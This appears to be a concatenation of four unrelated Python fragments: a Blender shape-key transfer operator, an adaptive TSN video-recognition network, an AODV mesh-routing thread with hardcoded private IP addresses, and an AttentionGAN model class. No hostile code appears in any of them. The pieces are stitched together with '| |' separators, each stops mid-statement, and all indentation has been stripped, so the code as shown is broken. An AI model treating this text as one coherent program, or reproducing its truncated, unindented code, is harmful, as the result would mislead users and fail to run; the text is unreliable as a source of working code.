source_ob.active_shape_key_index = source_ob.data.shape_keys.key_blocks.find(self.binded_shape_key.name)
else:
source_ob.active_shape_key_index = 0
self.source_bind_data = source_ob.data.vertices
#print(len(source_ob.data.vertices), len(self.source_bind_data))
self.kd = mathutils.kdtree.KDTree(len(self.source_bind_data))
for index, vert in enumerate(self.source_bind_data):
co = compat.mul(source_ob.matrix_world, vert.co)
self.kd.insert(co, index)
self.kd.balance()
for i, key in enumerate(source_ob.data.shape_keys.key_blocks):
if i == 0:
continue
else:
key.value = 0.0
def finish(self, context):
target_me = self.target_ob.data
if self.is_remove_empty:
for source_shape_key_name, is_shaped in reversed( list(self.is_shapeds.items()) ):
if not is_shaped:
target_shape_key = target_me.shape_keys.key_blocks.get(source_shape_key_name)
if not target_shape_key:
continue
key_blocks_values = target_me.shape_keys.key_blocks.values()
is_used = False
for key in key_blocks_values:
if key.relative_key == target_shape_key:
is_used = True
break
if not is_used:
self.target_ob.shape_key_remove(target_shape_key)
self.target_ob.active_shape_key_index = 0
def cancel(self, context):
report_type = (self.is_canceled == 'WARNING' and 'WARNING') or 'ERROR'
self.report(type={report_type}, message="Shape key transfer canceled. Results may not be as expected. Use Undo / Ctrl Z to revert changes")
self.cleanup(context)
def cleanup(self, context):
#compat.set_select(source_original_ob, True)
if self.target_ob:
#compat.set_select(target_ob, True)
compat.set_active(context, self.target_ob)
if self.og_source_ob:
self.og_source_ob.hide_set(False)
source_me = self.source_ob and self.source_ob.data
if source_me:
common.remove_data([self.source_ob, source_me])
elif self.source_ob:
common.remove_data([self.source_ob])
if self._timer:
wm = context.window_manager
wm.event_timer_remove(self._timer)
if self.pre_mode:
bpy.ops.object.mode_set(mode=self.pre_mode)
if self.pre_selected:
for ob in self.pre_selected:
compat.set_select(ob, True)
self.target_ob = None
self.source_ob = None
self._timer = None
self.pre_mode = None
self.pre_selected = None
self.binded_shape_key = None
self.kd = None
self.is_shapeds = {}
@compat.BlRegister()
class CNV_OT_quick_shape_key_transfer(shape_key_transfer_op, bpy.types.Operator):
bl_idname = 'object.quick_shape_key_transfer'
bl_label = "Quick shape key transfer"
bl_description = "Fast transfer of other selected mesh's shape keys to active mesh"
bl_options = {'REGISTER', 'UNDO'}
step_size = bpy.props.IntProperty(name="Step Size (low = quality, high = speed)", default=4, min=1, max=100, soft_min=1, soft_max=10, step=1)
near_vert_indexs = []
my_iter = None
@classmethod
def poll(cls, context):
obs = context.selected_objects
if len(obs) == 2:
active_ob = context.active_object
for ob in obs:
if ob.type != 'MESH':
return False
if ob.data.shape_keys and ob.name != active_ob.name:
return True
return False
def invoke(self, context, event):
return context.window_manager.invoke_props_dialog(self)
def draw(self, context):
shape_key_transfer_op.draw(self, context)
self.layout.prop(self, 'step_size')
def prepare(self, context):
shape_key_transfer_op.prepare(self, context)
target_me = self.target_ob.data
source_me = self.source_ob.data
self.near_vert_indexs = list( range(len(target_me.vertices)) )
for v in target_me.vertices:
near_co = compat.mul(self.target_ob.matrix_world, v.co) #v.co
self.near_vert_indexs[v.index] = self.kd.find(near_co)[1]
self.my_iter = iter( transfer_shape_key_iter(self.target_ob, self.source_ob, self.binded_shape_key) )
context.window_manager.progress_begin( 0, len(source_me.shape_keys.key_blocks) * len(target_me.vertices) )
context.window_manager.progress_update( 0 )
def loop(self, context):
source_shape_key_index, target_shape_key, binded_shape_key_data, source_shape_key_data, target_shape_key_data = next(self.my_iter, (-1, None, None, None, None))
#print(source_shape_key_index, target_shape_key, binded_shape_key_data, source_shape_key_data, target_shape_key_data)
if not target_shape_key:
context.window_manager.progress_end()
return True
progress = source_shape_key_index * len(self.target_ob.data.vertices)
def check(index):
near_vert_index = self.near_vert_indexs[index]
near_shape_co = source_shape_key_data[near_vert_index].co - binded_shape_key_data[near_vert_index].co
context.window_manager.progress_update( progress + index )
if abs(near_shape_co.length) > 2e-126: # 2e-126 is the smallest float != 0
target_shape_key_data[index].co += near_shape_co
return True
is_changed = False
just_changed = False
found_more = False
for i in range(0, len(target_shape_key_data), self.step_size):
if check(i) or found_more:
is_changed = True
found_more = False
if not just_changed:
for j in range(i-self.step_size+1, i):
if j < len(target_shape_key_data) and j > 0:
found_more = check(j) or found_more
for k in range(i+1, i+self.step_size):
if k < len(target_shape_key_data) and k > 0:
found_more = check(k) or found_more
just_changed = True
else:
just_changed = False
if not self.is_shapeds.get(target_shape_key.name):
self.is_shapeds[target_shape_key.name] = is_changed
self.my_iter.update() # only call this when done with current iteration.
def cleanup(self, context):
self.near_vert_indexs = []
self.my_iter.free()
self.my_iter = None
shape_key_transfer_op.cleanup(self, context)
@compat.BlRegister()
class CNV_OT_precision_shape_key_transfer(shape_key_transfer_op, bpy.types.Operator):
bl_idname = 'object.precision_shape_key_transfer'
bl_label = "Precision shape key transfer"
bl_description = "Transfers the | |
from torch import nn
from ops.basic_ops import ConsensusModule
from ops.transforms import *
from torch.nn.init import normal_, constant_
import torch.nn.functional as F
from efficientnet_pytorch import EfficientNet
from ops.net_flops_table import feat_dim_dict
from torch.distributions import Categorical
def init_hidden(batch_size, cell_size):
init_cell = torch.Tensor(batch_size, cell_size).zero_()
if torch.cuda.is_available():
init_cell = init_cell.cuda()
return init_cell
class TSN_Ada(nn.Module):
def __init__(self, num_class, num_segments,
base_model='resnet101', consensus_type='avg', before_softmax=True, dropout=0.8,
crop_num=1, partial_bn=True, pretrain='imagenet', fc_lr5=False, args=None):
super(TSN_Ada, self).__init__()
self.num_segments = num_segments
self.reshape = True
self.before_softmax = before_softmax
self.dropout = dropout
self.crop_num = crop_num
self.consensus_type = consensus_type
self.pretrain = pretrain
self.fc_lr5 = fc_lr5
# TODO(yue)
self.args = args
self.rescale_to = args.rescale_to
if self.args.ada_reso_skip:
base_model = self.args.backbone_list[0] if len(self.args.backbone_list) >= 1 else None
self.base_model_name = base_model
self.num_class = num_class
self.multi_models = False
self.time_steps = self.num_segments
if self.args.ada_reso_skip:
self.reso_dim = self._get_resolution_dimension()
self.skip_dim = len(self.args.skip_list)
self.action_dim = self._get_action_dimension()
self._prepare_policy_net()
self._extends_to_multi_models()
self._prepare_base_model(base_model)
self._prepare_fc(num_class)
self.consensus = ConsensusModule(consensus_type, args=self.args)
if not self.before_softmax:
self.softmax = nn.Softmax()
self._enable_pbn = partial_bn
if partial_bn:
self.partialBN(True)
def _extends_to_multi_models(self):
if len(self.args.backbone_list) >= 1:
self.multi_models = True
self.base_model_list = nn.ModuleList()
self.new_fc_list = nn.ModuleList()
def _prep_a_net(self, model_name, shall_pretrain):
if "efficientnet" in model_name:
if shall_pretrain:
model = EfficientNet.from_pretrained(model_name)
else:
model = EfficientNet.from_named(model_name)
model.last_layer_name = "_fc"
else:
model = getattr(torchvision.models, model_name)(shall_pretrain)
if "resnet" in model_name:
model.last_layer_name = 'fc'
elif "mobilenet_v2" in model_name:
model.last_layer_name = 'classifier'
return model
def _get_resolution_dimension(self):
reso_dim = 0
for i in range(len(self.args.backbone_list)):
reso_dim += self.args.ada_crop_list[i]
if self.args.policy_also_backbone:
reso_dim += 1
return reso_dim
def _get_action_dimension(self):
action_dim = self.reso_dim + self.skip_dim
return action_dim
def _prepare_policy_net(self):
shall_pretrain = not self.args.policy_from_scratch
self.lite_backbone = self._prep_a_net(self.args.policy_backbone, shall_pretrain)
self.policy_feat_dim = feat_dim_dict[self.args.policy_backbone]
self.rnn = nn.LSTMCell(input_size=self.policy_feat_dim, hidden_size=self.args.hidden_dim, bias=True)
def _prepare_base_model(self, base_model):
self.input_size = 224
self.input_mean = [0.485, 0.456, 0.406]
self.input_std = [0.229, 0.224, 0.225]
if self.args.ada_reso_skip:
shall_pretrain = len(self.args.model_paths) == 0 or self.args.model_paths[0].lower() != 'none'
for bbi, backbone_name in enumerate(self.args.backbone_list):
model = self._prep_a_net(backbone_name, shall_pretrain)
self.base_model_list.append(model)
else:
self.base_model = self._prep_a_net(base_model, self.pretrain == 'imagenet')
def _prepare_fc(self, num_class):
def make_a_linear(input_dim, output_dim):
linear_model = nn.Linear(input_dim, output_dim)
normal_(linear_model.weight, 0, 0.001)
constant_(linear_model.bias, 0)
return linear_model
i_do_need_a_policy_network = True
if self.args.ada_reso_skip and i_do_need_a_policy_network:
setattr(self.lite_backbone, self.lite_backbone.last_layer_name, nn.Dropout(p=self.dropout))
feed_dim = self.args.hidden_dim if not self.args.frame_independent else self.policy_feat_dim
self.linear = make_a_linear(feed_dim, self.action_dim)
self.lite_fc = make_a_linear(feed_dim, num_class)
if self.multi_models:
multi_fc_list = [None]
for bbi, base_model in enumerate(self.base_model_list):
for fc_i, exit_index in enumerate(multi_fc_list):
last_layer_name = base_model.last_layer_name
feature_dim = getattr(base_model, last_layer_name).in_features
new_fc = make_a_linear(feature_dim, num_class)
self.new_fc_list.append(new_fc)
setattr(base_model, last_layer_name, nn.Dropout(p=self.dropout))
elif self.base_model_name is not None:
if "mobilenet_v2" == self.base_model_name:
feature_dim = getattr(self.base_model, self.base_model.last_layer_name)[1].in_features
else:
feature_dim = getattr(self.base_model, self.base_model.last_layer_name).in_features
setattr(self.base_model, self.base_model.last_layer_name, nn.Dropout(p=self.dropout))
self.new_fc = make_a_linear(feature_dim, num_class)
def train(self, mode=True):
"""
Override the default train() to freeze the BN parameters
:return:
"""
super(TSN_Ada, self).train(mode)
if self._enable_pbn and mode:
print("Freezing BatchNorm2D except the first one.")
if self.args.ada_reso_skip:
models = [self.lite_backbone]
if self.multi_models:
models = models + self.base_model_list
else:
models = [self.base_model]
for the_model in models:
count = 0
bn_scale = 1
for m in the_model.modules():
if isinstance(m, nn.BatchNorm2d): # TODO(yue)
count += 1
if count >= (2 * bn_scale if self._enable_pbn else bn_scale):
m.eval()
# shutdown update in frozen mode
m.weight.requires_grad = False
m.bias.requires_grad = False
def partialBN(self, enable):
self._enable_pbn = enable
def get_optim_policies(self):
first_conv_weight = []
first_conv_bias = []
normal_weight = []
normal_bias = []
lr5_weight = []
lr10_bias = []
bn = []
custom_ops = []
conv_cnt = 0
bn_cnt = 0
for m in self.modules():
if isinstance(m, torch.nn.Conv2d) or isinstance(m, torch.nn.Conv1d):
ps = list(m.parameters())
conv_cnt += 1
if conv_cnt == 1:
first_conv_weight.append(ps[0])
if len(ps) == 2:
first_conv_bias.append(ps[1])
else:
normal_weight.append(ps[0])
if len(ps) == 2:
normal_bias.append(ps[1])
elif isinstance(m, torch.nn.Linear):
ps = list(m.parameters())
if self.fc_lr5:
lr5_weight.append(ps[0])
else:
normal_weight.append(ps[0])
if len(ps) == 2:
if self.fc_lr5:
lr10_bias.append(ps[1])
else:
normal_bias.append(ps[1])
elif isinstance(m, torch.nn.BatchNorm2d):
bn_cnt += 1
# later BN's are frozen
if not self._enable_pbn or bn_cnt == 1:
bn.extend(list(m.parameters()))
elif isinstance(m, torch.nn.LSTMCell):
ps = list(m.parameters())
normal_weight.append(ps[0])
normal_weight.append(ps[1])
normal_bias.append(ps[2])
normal_bias.append(ps[3])
elif len(m._modules) == 0:
if len(list(m.parameters())) > 0:
raise ValueError("New atomic module type: {}. Need to give it a learning policy".format(type(m)))
return [
{'params': first_conv_weight, 'lr_mult': 1, 'decay_mult': 1,
'name': "first_conv_weight"},
{'params': first_conv_bias, 'lr_mult': 2, 'decay_mult': 0,
'name': "first_conv_bias"},
{'params': normal_weight, 'lr_mult': 1, 'decay_mult': 1,
'name': "normal_weight"},
{'params': normal_bias, 'lr_mult': 2, 'decay_mult': 0,
'name': "normal_bias"},
{'params': bn, 'lr_mult': 1, 'decay_mult': 0,
'name': "BN scale/shift"},
{'params': custom_ops, 'lr_mult': 1, 'decay_mult': 1,
'name': "custom_ops"},
# for fc
{'params': lr5_weight, 'lr_mult': 5, 'decay_mult': 1,
'name': "lr5_weight"},
{'params': lr10_bias, 'lr_mult': 10, 'decay_mult': 0,
'name': "lr10_bias"},
]
def backbone(self, input_data, the_base_model, new_fc, signal=-1, indices_list=[], boost=False, b_t_c=False,
**kwargs):
_b, _tc, _h, _w = input_data.shape # TODO(yue) input (B, T*C, H, W)
_t, _c = _tc // 3, 3
if b_t_c:
input_b_t_c = input_data.view(_b, _t, _c, _h, _w)
else:
input_2d = input_data.view(_b * _t, _c, _h, _w)
if b_t_c:
feat = the_base_model(input_b_t_c, signal=signal, **kwargs)
else:
feat = the_base_model(input_2d)
_base_out = None
if b_t_c:
if new_fc is not None:
_base_out = new_fc(feat.view(_b * _t, -1)).view(_b, _t, -1)
else:
if new_fc is not None:
_base_out = new_fc(feat).view(_b, _t, -1)
feat = feat.view(_b, _t, -1)
return feat, _base_out
def get_lite_j_and_r(self, input_list, online_policy, tau):
feat_lite, _ = self.backbone(input_list[self.args.policy_input_offset], self.lite_backbone, None)
r_list = []
lite_j_list = []
batch_size = feat_lite.shape[0]
hx = init_hidden(batch_size, self.args.hidden_dim)
cx = init_hidden(batch_size, self.args.hidden_dim)
remain_skip_vector = torch.zeros(batch_size, 1)
old_hx = None
old_r_t = None
if self.args.use_reinforce:
log_prob_r_list = []
prob_r_list = []
for t in range(self.time_steps):
if self.args.frame_independent:
feat_t = feat_lite[:, t]
else:
hx, cx = self.rnn(feat_lite[:, t], (hx, cx))
feat_t = hx
if self.args.use_reinforce:
p_t = F.softmax(self.linear(feat_t), dim=1).clamp(min=1e-8)
else:
p_t = torch.log(F.softmax(self.linear(feat_t), dim=1).clamp(min=1e-8))
j_t = self.lite_fc(feat_t)
lite_j_list.append(j_t) # TODO as pred
# TODO (yue) need a simple case to illustrate this
if online_policy:
if self.args.use_reinforce:
m = Categorical(p_t)
prob_r_list.append(p_t)
r_t_idx = m.sample()
r_t = torch.eye(self.action_dim)[r_t_idx].cuda()
log_prob_r_t = m.log_prob(r_t_idx)
log_prob_r_list.append(log_prob_r_t)
else:
r_t = torch.cat(
[F.gumbel_softmax(p_t[b_i:b_i + 1], tau, True) for b_i in range(p_t.shape[0])])
# TODO update states and r_t
if old_hx is not None:
take_bool = remain_skip_vector > 0.5
take_old = torch.tensor(take_bool, dtype=torch.float).cuda()
take_curr = torch.tensor(~take_bool, dtype=torch.float).cuda()
hx = old_hx * take_old + hx * take_curr
r_t = old_r_t * take_old + r_t * take_curr
# TODO update skipping_vector
for batch_i in range(batch_size):
for skip_i in range(self.action_dim - self.reso_dim):
# TODO(yue) first condition to avoid valuing skip vector forever
if remain_skip_vector[batch_i][0] < 0.5 and r_t[batch_i][self.reso_dim + skip_i] > 0.5:
remain_skip_vector[batch_i][0] = self.args.skip_list[skip_i]
old_hx = hx
old_r_t = r_t
r_list.append(r_t) # TODO as decision
remain_skip_vector = (remain_skip_vector - 1).clamp(0)
if online_policy:
if self.args.use_reinforce:
return lite_j_list, torch.stack(r_list, dim=1), torch.stack(log_prob_r_list, dim=1)
else:
return lite_j_list, torch.stack(r_list, dim=1)
else:
return lite_j_list, None
def using_online_policy(self):
if any([self.args.offline_lstm_all, self.args.offline_lstm_last]):
return False
elif any([self.args.random_policy, self.args.all_policy]):
return False
elif self.args.real_scsampler:
return False
else:
return True
def input_fusion(self, input_data, r):
# TODO data: B * TC * H * W
# TODO r : B * T * T
_b, _tc, _h, _w = input_data.shape
_c = _tc // self.args.num_segments
fuse_data_list = []
for bi in range(_b):
if self.args.identity_prior:
prior = torch.eye(self.args.num_segments).to(input_data.device)
else:
prior = 0
if self.args.lower_mask:
mask = torch.tril(torch.ones(self.args.num_segments, self.args.num_segments)).to(input_data.device)
else:
mask = 1
real_r = (r[bi] + prior) * mask
if self.args.direct_lower_mask:
real_r = torch.tril(real_r)
if self.args.row_normalization:
real_r = real_r / (real_r.sum(dim=1, keepdim=True).clamp_min(1e-6))
fused_data = torch.matmul(real_r, input_data[bi].view(self.args.num_segments, _c * _h * _w))
fuse_data_list.append(fused_data)
return torch.stack(fuse_data_list, dim=0).view(_b, _tc, _h, _w)
def get_feat_and_pred(self, input_list, r_all, **kwargs):
feat_out_list = []
base_out_list = []
ind_list = []
for bb_i, the_backbone in enumerate(self.base_model_list):
feat_out, base_out = self.backbone(input_list[bb_i], the_backbone, self.new_fc_list[bb_i])
feat_out_list.append(feat_out)
base_out_list.append(base_out)
return feat_out_list, base_out_list, ind_list
def late_fusion(self, base_out_list, in_matrix, out_matrix):
return base_out_list
def forward(self, *argv, **kwargs):
if not self.args.ada_reso_skip: # TODO simple TSN
_, base_out = self.backbone(kwargs["input"][0], self.base_model, self.new_fc,
signal=self.args.default_signal)
output = self.consensus(base_out)
return output.squeeze(1)
input_list = kwargs["input"]
batch_size = input_list[0].shape[0] # TODO(yue) input[0] B*(TC)*H*W
if self.args.use_reinforce:
lite_j_list, r_all, r_log_prob = self.get_lite_j_and_r(input_list, self.using_online_policy(),
kwargs["tau"])
else:
lite_j_list, r_all = self.get_lite_j_and_r(input_list, self.using_online_policy(), kwargs["tau"])
if self.multi_models:
if "tau" not in kwargs:
kwargs["tau"] = None
feat_out_list, base_out_list, ind_list = self.get_feat_and_pred(input_list, r_all, tau=kwargs["tau"])
else:
feat_out_list, base_out_list, ind_list = [], [], []
if self.args.policy_also_backbone:
base_out_list.append(torch.stack(lite_j_list, dim=1))
if self.args.offline_lstm_last: # TODO(yue) no policy - use policy net as backbone - just LSTM(last)
return lite_j_list[-1].squeeze(1), None, None, None
elif self.args.offline_lstm_all: # TODO(yue) no policy - | |
import threading, logging, socket, os, select, re
from threading import Timer
# Defines
AODV_HELLO_INTERVAL = 10
AODV_HELLO_TIMEOUT = 30
AODV_PATH_DISCOVERY_TIME = 30
AODV_ACTIVE_ROUTE_TIMEOUT = 300
# Class Definition
class aodv(threading.Thread):
# Constructor
def __init__(self):
threading.Thread.__init__(self)
self.node_id = ""
self.num_nodes = 0
self.seq_no = 0
self.rreq_id = 0
self.listener_port = 0
self.aodv_port = 0
self.tester_port = 0
self.listener_sock = 0
self.aodv_sock = 0
self.tester_sock = 0
self.log_file = ""
self.command = ""
self.status = ""
self.neighbors = dict()
self.routing_table = dict()
self.message_box = dict()
self.rreq_id_list = dict()
self.pending_msg_q = []
self.status = "Active"
self.hello_timer = 0
# Set the Node ID
def set_node_id(self, nid):
self.node_id = nid
# Set the number of nodes in the network
def set_node_count(self, count):
self.num_nodes = count
# Get the port associated with the listener thread for the given node
def get_listener_thread_port(self, node):
return 33100
# port = {'n1': 1000,
# 'n2': 1100,
# 'n3': 1200,
# 'n4': 1300,
# 'n5': 1400,
# 'n6': 1500,
# 'n7': 1600,
# 'n8': 1700,
# 'n9': 1800,
# 'n10': 1900}['n'+str(node)]
# return port
# Get the port used to communicate with the listener thread for this node
def get_listener_port(self, node):
return 33200
# port = {'n1': 2000,
# 'n2': 2100,
# 'n3': 2200,
# 'n4': 2300,
# 'n5': 2400,
# 'n6': 2500,
# 'n7': 2600,
# 'n8': 2700,
# 'n9': 2800,
# 'n10': 2900}['n'+str(node)]
# return port
# Get the port associated with sending and receiving AODV messages
def get_aodv_port(self, node):
# return 33300
port = {'n1': 33310,
'n2': 33320,
'n3': 33330,
'n4': 33340,
'n5': 33350}['n'+str(node)]
return port
# Get the port associated with sending and receiving AODV messages
def get_aodv_ip(self, node):
ip = {'n1': '10.35.70.38',
'n2': '10.35.70.6',
'n3': '10.35.70.26'}['n'+str(node)]
return ip
# Get the tester port associated with this node
def get_tester_port(self, node):
return 33500
# port = {'n1': 5100,
# 'n2': 5200,
# 'n3': 5300,
# 'n4': 5400,
# 'n5': 5500,
# 'n6': 5600,
# 'n7': 5700,
# 'n8': 5800,
# 'n9': 5900,
# 'n10': 6000}['n'+str(node)]
# return port
# Create / Restart the lifetime timer for the given route
def aodv_restart_route_timer(self, route, create):
if (create == False):
timer = route['Lifetime']
timer.cancel()
timer = Timer(AODV_ACTIVE_ROUTE_TIMEOUT,
self.aodv_process_route_timeout, [route])
route['Lifetime'] = timer
route['Status'] = 'Active'
timer.start()
# Send a message
def aodv_send(self, destination, destination_port, message):
try:
message_bytes = bytes(message, 'utf-8')
destination_ip = self.get_aodv_ip(destination)
self.aodv_sock.sendto(message_bytes, 0,
(destination_ip, destination_port))
except:
pass
# Send the hello message to all the neighbors
def aodv_send_hello_message(self):
try:
# Send message to each neighbor
for n in self.neighbors.keys():
message_type = "HELLO_MESSAGE"
sender = self.node_id
message_data = "Hello message from " + str(self.node_id)
message = message_type + ":" + sender + ":" + message_data
port = self.get_aodv_port(n)
self.aodv_send(n, int(port), message)
logging.debug("['" + message_type + "', '" + sender + "', " +
"Sending hello message to " + str(n) + "']")
# Restart the timer
self.hello_timer.cancel()
self.hello_timer = Timer(AODV_HELLO_INTERVAL, self.aodv_send_hello_message, ())
self.hello_timer.start()
except:
pass
# Process incoming hello messages
def aodv_process_hello_message(self, message):
logging.debug(message)
sender = message[1]
# Get the sender's ID and restart its neighbor liveness timer
try:
if (sender in self.neighbors.keys()):
neighbor = self.neighbors[sender]
timer = neighbor['Timer-Callback']
timer.cancel()
timer = Timer(AODV_HELLO_TIMEOUT,
self.aodv_process_neighbor_timeout, [sender])
self.neighbors[sender] = {'Neighbor': sender,
'Timer-Callback': timer}
timer.start()
# Restart the lifetime timer
route = self.routing_table[sender]
self.aodv_restart_route_timer(route, False)
else:
#
# We come here when we get a hello message from a node that
# is not there in our neighbor list. This happens when a
# node times out and comes back up again. Add the node to
# our neighbor table.
#
timer = Timer(AODV_HELLO_TIMEOUT,
self.aodv_process_neighbor_timeout, [sender])
self.neighbors[sender] = {'Neighbor': sender,
'Timer-Callback': timer}
timer.start()
# Update the routing table as well
if (sender in self.routing_table.keys()):
route = self.routing_table[sender]
self.aodv_restart_route_timer(route, False)
else:
self.routing_table[sender] = {'Destination': sender,
'Destination-Port': self.get_aodv_port(sender),
'Next-Hop': sender,
'Next-Hop-Port': self.get_aodv_port(sender),
'Seq-No': '1',
'Hop-Count': '1',
'Status': 'Active'}
self.aodv_restart_route_timer(self.routing_table[sender], True)
except KeyError:
# This neighbor has not been added yet. Ignore the message.
pass
# Process incoming application message
def aodv_process_user_message(self, message):
# Get the message contents, sender and receiver
sender = message[1]
receiver = message[2]
msg = message[3]
# Check if the message is for us
if (receiver == self.node_id):
# Add the message to the message box
self.message_box[msg] = {'Sender': sender, 'Message': msg}
# Log the message and notify the user
logging.debug(message)
print("New message arrived. Issue 'view_messages' to see the contents")
else:
#
# Forward the message by looking up the next-hop. We should have a
# route for the destination.
#
# TODO update lifetime for the route
route = self.routing_table[receiver]
next_hop = route['Next-Hop']
next_hop_port = int(route['Next-Hop-Port'])
self.aodv_restart_route_timer(route, False)
message = message[0] + ":" + message[1] + ":" + message[2] + ":" + message[3]
self.aodv_send(next_hop, next_hop_port, message)
logging.debug("['USER_MESSAGE', '" + sender + " to " + receiver + "', " + msg + "']")
# Process an incoming RREQ message
def aodv_process_rreq_message(self, message):
# Extract the relevant parameters from the message
message_type = message[0]
sender = message[1]
hop_count = int(message[2]) + 1
message[2] = str(hop_count)
rreq_id = int(message[3])
dest = message[4]
dest_seq_no = int(message[5])
orig = message[6]
orig_seq_no = int(message[7])
orig_port = self.get_aodv_port(orig)
sender_port = self.get_aodv_port(sender)
# Ignore the message if we are not active
if (self.status == "Inactive"):
return
logging.debug("['" + message[0] + "', 'Received RREQ to " + message[4] + " from " + sender + "']")
# Discard this RREQ if we have already received this before
if (orig in self.rreq_id_list.keys()):
node_list = self.rreq_id_list[orig]
per_node_rreq_id_list = node_list['RREQ_ID_List']
if rreq_id in per_node_rreq_id_list.keys():
logging.debug("['RREQ_MESSAGE', 'Ignoring duplicate RREQ (" + orig + ", " + str(rreq_id) + ") from " + sender + "']")
return
# This is a new RREQ message. Buffer it first
if (orig in self.rreq_id_list.keys()):
per_node_list = self.rreq_id_list[orig]
else:
per_node_list = dict()
path_discovery_timer = Timer(AODV_PATH_DISCOVERY_TIME,
self.aodv_process_path_discovery_timeout,
[orig, rreq_id])
per_node_list[rreq_id] = {'RREQ_ID': rreq_id,
'Timer-Callback': path_discovery_timer}
self.rreq_id_list[orig] = {'Node': self.node_id,
'RREQ_ID_List': per_node_list}
path_discovery_timer.start()
#
# Check if we have a route to the source. If we have, see if we need
# to update it. Specifically, update it only if:
#
# 1. The destination sequence number for the route is less than the
# originator sequence number in the packet
# 2. The sequence numbers are equal, but the hop_count in the packet
# + 1 is lesser than the one in routing table
# 3. The sequence number in the routing table is unknown
#
# If we don't have a route for the originator, add an entry
if orig in self.routing_table.keys():
# TODO update lifetime timer for this route
route = self.routing_table[orig]
if (int(route['Seq-No']) < orig_seq_no):
route['Seq-No'] = orig_seq_no
self.aodv_restart_route_timer(route, False)
elif (int(route['Seq-No']) == orig_seq_no):
if (int(route['Hop-Count']) > hop_count):
route['Hop-Count'] = hop_count
route['Next-Hop'] = sender
route['Next-Hop-Port'] = sender_port
self.aodv_restart_route_timer(route, False)
elif (int(route['Seq-No']) == -1):
route['Seq-No'] = orig_seq_no
self.aodv_restart_route_timer(route, False)
else:
# TODO update lifetime timer for this route
self.routing_table[orig] = {'Destination': str(orig),
'Destination-Port': str(orig_port),
'Next-Hop': str(sender),
'Next-Hop-Port': str(sender_port),
'Seq-No': str(orig_seq_no),
'Hop-Count': str(hop_count),
'Status': 'Active'}
self.aodv_restart_route_timer(self.routing_table[orig], True)
#
# Check if we are the destination. If we are, generate and send an
# RREP back.
#
if (self.node_id == dest):
self.aodv_send_rrep(orig, sender, dest, dest, 0, 0)
return
#
# We are not the destination. Check if we have a valid route
# to the destination. If we have, generate and send back an
# RREP.
#
if (dest in self.routing_table.keys()):
# Verify that the route is valid and has a higher seq number
route = self.routing_table[dest]
status = route['Status']
route_dest_seq_no = int(route['Seq-No'])
if (status == "Active" and route_dest_seq_no >= dest_seq_no):
self.aodv_send_rrep(orig, sender, self.node_id, dest, route_dest_seq_no, int(route['Hop-Count']))
return
else:
# Rebroadcast the RREQ
self.aodv_forward_rreq(message)
# Process an incoming RREP | |
<filename>models/attention_gan_model.py
import torch
import itertools
from util.image_pool import ImagePool
from .base_model import BaseModel
from . import networks
from util.util import prob_2_entropy,to_3dim,to_4dim
import numpy as np
import torch.nn.functional as F
class AttentionGANModel(BaseModel):
@staticmethod
def modify_commandline_options(parser, is_train=True):
parser.set_defaults(no_dropout=True) # default CycleGAN did not use dropout
if is_train:
parser.add_argument('--lambda_A', type=float, default=10.0, help='weight for cycle loss (A -> B -> A)')
parser.add_argument('--lambda_B', type=float, default=10.0, help='weight for cycle loss (B -> A -> B)')
parser.add_argument('--lambda_identity', type=float, default=0.5, help='use identity mapping. Setting lambda_identity other than 0 has an effect of scaling the weight of the identity mapping loss. For example, if the weight of the identity loss should be 10 times smaller than the weight of the reconstruction loss, please set lambda_identity = 0.1')
return parser
def __init__(self, opt):
BaseModel.__init__(self, opt)
# specify the training losses you want to print out. The training/test scripts will call <BaseModel.get_current_losses>
self.loss_names = ['D_A', 'G_A', 'cycle_A', 'idt_A', 'G_B', 'cycle_B', 'idt_B']
# specify the images you want to save/display. The training/test scripts will call <BaseModel.get_current_visuals>
visual_names_A = ['real_A', 'fake_B', 'rec_A', 'o1_b', 'o2_b', 'a1_b', 'a2_b', 'i1_b']
visual_names_B = ['real_B', 'fake_A', 'rec_B', 'o1_a', 'o2_a', 'a1_a', 'a2_a', 'i1_a']
if self.isTrain and self.opt.lambda_identity > 0.0: # if identity loss is used, we also visualize idt_B=G_A(B) ad idt_A=G_A(B)
visual_names_A.append('idt_B')
visual_names_B.append('idt_A')
if self.opt.saveDisk:
self.visual_names = ['real_A', 'fake_B', 'rec_A', 'a1_b', 'a2_b']
else:
self.visual_names = visual_names_A + visual_names_B # combine visualizations for A and B
# specify the models you want to save to the disk. The training/test scripts will call <BaseModel.save_networks> and <BaseModel.load_networks>.
if self.isTrain:
self.model_names = ['G_A', 'G_B', 'D_A', 'D_B']
else: # during test time, only load Gs
self.model_names = ['G_A', 'G_B']
# define networks (both Generators and discriminators)
# The naming is different from those used in the paper.
# Code (vs. paper): G_A (G), G_B (F), D_A (D_Y), D_B (D_X)
self.netG_A = networks.define_G(opt.input_nc, opt.output_nc, opt.ngf, 'our', opt.norm,
not opt.no_dropout, opt.init_type, opt.init_gain, self.gpu_ids)
self.netG_B = networks.define_G(opt.output_nc, opt.input_nc, opt.ngf, 'our', opt.norm,
not opt.no_dropout, opt.init_type, opt.init_gain, self.gpu_ids)
if self.isTrain: # define discriminators
self.netD_A = networks.define_D(opt.output_nc, opt.ndf, opt.netD,
opt.n_layers_D, opt.norm, opt.init_type, opt.init_gain, self.gpu_ids)
self.netD_B = networks.define_D(opt.input_nc, opt.ndf, opt.netD,
opt.n_layers_D, opt.norm, opt.init_type, opt.init_gain, self.gpu_ids)
self.netD_content_A = networks.define_D(opt.input_nc, opt.ndf, opt.netD,
opt.n_layers_D, opt.norm, opt.init_type, opt.init_gain, self.gpu_ids)
self.netD_content_B = networks.define_D(opt.input_nc, opt.ndf, opt.netD,
opt.n_layers_D, opt.norm, opt.init_type, opt.init_gain,
self.gpu_ids)
if self.isTrain:
if opt.lambda_identity > 0.0: # only works when input and output images have the same number of channels
assert(opt.input_nc == opt.output_nc)
self.fake_A_pool = ImagePool(opt.pool_size) # create image buffer to store previously generated images
self.fake_B_pool = ImagePool(opt.pool_size) # create image buffer to store previously generated images
self.fake_C_A_pool = ImagePool(opt.pool_size) # create image buffer to store previously generated images
self.fake_C_B_pool = ImagePool(opt.pool_size) # create image buffer to store previously generated images
self.real_C_A_pool = ImagePool(opt.pool_size) # create image buffer to store previously generated images
self.real_C_B_pool = ImagePool(opt.pool_size) # create image buffer to store previously generated images
# define loss functions
self.criterionGAN = networks.GANLoss(opt.gan_mode).to(self.device) # define GAN loss.
self.criterionCycle = torch.nn.L1Loss()
self.criterionIdt = torch.nn.L1Loss()
# initialize optimizers; schedulers will be automatically created by function <BaseModel.setup>.
